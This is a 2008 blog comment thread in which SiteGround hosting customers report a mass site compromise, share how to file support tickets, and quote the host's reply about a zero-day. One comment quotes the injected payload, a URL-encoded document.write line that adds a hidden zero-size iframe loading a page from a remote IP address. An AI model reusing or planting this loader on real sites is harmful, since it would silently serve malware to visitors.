Comments on: OH NOES

By: db

db — Mon, 17 Mar 2008 00:32:57 +0000

@ Juan, yes I got the same message.

@ Patrick, I was not physically able to submit a ticket, it looped me round and round. I am aware of the procedure. Thanks though.

By: Patrick

Patrick — Sun, 16 Mar 2008 22:16:22 +0000

My site was also hacked.

You have to submit a “site down” report to Siteground. First, you have to log in (https://www.siteground.com/customer_login.htm).

Then submit your support ticket: https://www.siteground.com/support/autocheck/PostServerDown.php?step=1

Just describe your problem and follow the steps to create the report. They’ll respond within a few minutes.

You can view their responses here: https://www.siteground.com/support/support.htm?list=1

By: juan

juan — Sun, 16 Mar 2008 22:11:10 +0000

Quick update, im now clear.

Siteground says:

Hello Juan,

Thank you for contacting our HelpDesk.

There has been a security issue on the server caused by a zero day vulerability attack in one of our third party scripts. This security hole has had a limited effect due to Siteground’s high security standards and has been immediately fixed.

Siteground uses the most secure Linux kernels patched with GRSecurity and each server is configured to allow very limited privileged access. We have gone even further to offer the latest PHP 5.2 which prevents many security problems by disallowing remote code inclusion and protects many vulnerable customers’ applications.

This allows us to offer the most secure shared server environment and our customers can feel perfectly safe about their sites.

The latest zero day vulnerability attack has proven our readiness to respond to any security threat immediately and remedy its malicious effects with no consequences.

After your ticket, we have checked in details your site and made sure there is no malicious code left after the attack. Please check it on your side and let us know if you find any problems.

Thank you for your understanding and support in our efforts to offer you the best hosting service.

Best Regards,

Dimo
Senior Support Team
SiteGround.com

By: R

Sun, 16 Mar 2008 21:47:58 +0000

Hi guys… my site got nailed too. I fixed all the index.htm files and it looks like Siteground admin got the rest of them. (Woo hoo!)

Bobbertalk.com

By: db

db — Sun, 16 Mar 2008 18:11:47 +0000

See post: I submitted a ticket to billing etc.

See newer posts on my blog: they seem to be resolving the issue, with luck they’ll get to you soon!

By: Leiandra

Leiandra — Sun, 16 Mar 2008 18:07:10 +0000

Where/how did you report it to Siteground? I can’t seem to find anywhere to report a problem like this.

By: juan

juan — Sun, 16 Mar 2008 15:12:31 +0000

Yup, I can confirm that every .php file in my user area at siteground has had:

document.write( unescape( ‘%3C%73%63%72%69%70%74%3E%0A%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%20%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%35%38%2E%36%35%2E%32%33%36%2E%38%39%2F%69%6E%33%2F%69%6E%64%65%78%2E%70%68%70%22%20%77%69%64%74%68%3D%22%30%22%20%68%65%69%67%68%74%3D%22%30%22%20%62%6F%72%64%65%72%3D%22%30%22%3E%3C%2F%69%66%72%61%6D%65%3E%27%29%3B%0A%3C%2F%73%63%72%69%70%74%3E’ ) );

added onto it.

Oh dear, oh dear, oh dear ….

By: Robert

Robert — Sun, 16 Mar 2008 08:21:43 +0000

It’s not just your site.. Seems to be all the sites at Siteground…